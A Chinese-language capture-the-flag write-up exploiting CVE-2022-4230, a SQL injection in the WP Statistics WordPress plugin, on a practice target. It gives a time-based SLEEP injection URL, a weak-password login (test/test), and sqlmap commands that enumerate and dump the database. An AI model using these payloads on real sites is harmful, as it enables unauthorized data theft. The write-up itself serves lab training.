靶标介绍
WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。
CVE-2022-4230漏洞介绍
wordpress插件漏洞。在小于13.2.9的版本中,该插件未转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。
漏洞利用方法
以具有查看 WP 统计权限的用户身份登录,并通过 https://example.com/wp-admin/admin-ajax.php?action=rest-nonce 获取一个 nonce,然后在以下 URL 中使用它,该 URL 将延迟 5 秒:http://example.com/wp-json/wp-statistics/v2/metabox?_wpnonce=NONCE&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5))) Mdgs)--%20HsBR
靶标攻克过程
1、开启靶场后发现什么都没有
2、使用御剑进行扫描,访问readme.html出现以下界面
3、点击login page发现一个登陆页面
4、 左下角有个返回test,大概率是一个登录用户,这里使用弱口令test test进行登录
5、登录成功后,发现 WordPress的版本为6.6.2,存在CVE-2022-4230漏洞
6、获取一个随机数http://eci-2ze6pwgwiogm9gvts0fs.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce
7、根据漏洞利用方法和获取到的随机数,访问以下url: http://eci-2ze6pwgwiogm9gvts0fs.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=4624553bb7&name=words&search_engine=aaa%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))%20Mdgs)--%20HsBR _wpnonce就是获取到的随机数 得到如下页面
8、 打开burp,将该页面的原始数据抓取出来保存为test.txt文件并放入kali,使用sqlmap进行注入
9、首先跑数据库的名称,爆破出wordpress
sqlmap -r test.txt --batch --dbs
10、接着跑wordpress库中的表名,看到了敏感字段flag
sqlmap -r test.txt --batch -D wordpress --tables
11、继续跑flag表中的字段名 得到flag字段
sqlmap -r test.txt --batch -D wordpress -T flag --columns
12、最后将flag字段对应的值跑出来,即得到flag
sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump